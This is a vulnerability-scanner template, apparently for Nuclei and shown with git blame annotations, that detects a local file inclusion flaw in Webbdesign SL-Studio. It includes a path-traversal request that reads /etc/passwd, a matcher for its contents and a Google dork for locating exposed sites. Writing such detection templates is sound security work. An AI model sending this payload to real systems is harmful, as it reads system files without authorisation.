2021-12-28 08:23:04 +00:00
|
|
|
id: sl-studio-lfi
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: Webbdesign SL-Studio - Local File Inclusion
|
2021-12-28 08:23:04 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: Webbdesign SL-Studio is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://cxsecurity.com/issue/WLB-2018110187
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2021-12-29 03:50:13 +00:00
|
|
|
metadata:
|
2022-09-08 22:39:14 +00:00
|
|
|
google-query: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
|
2021-12-28 08:23:04 +00:00
|
|
|
tags: slstudio,lfi
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-05 13:57:51 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/04
|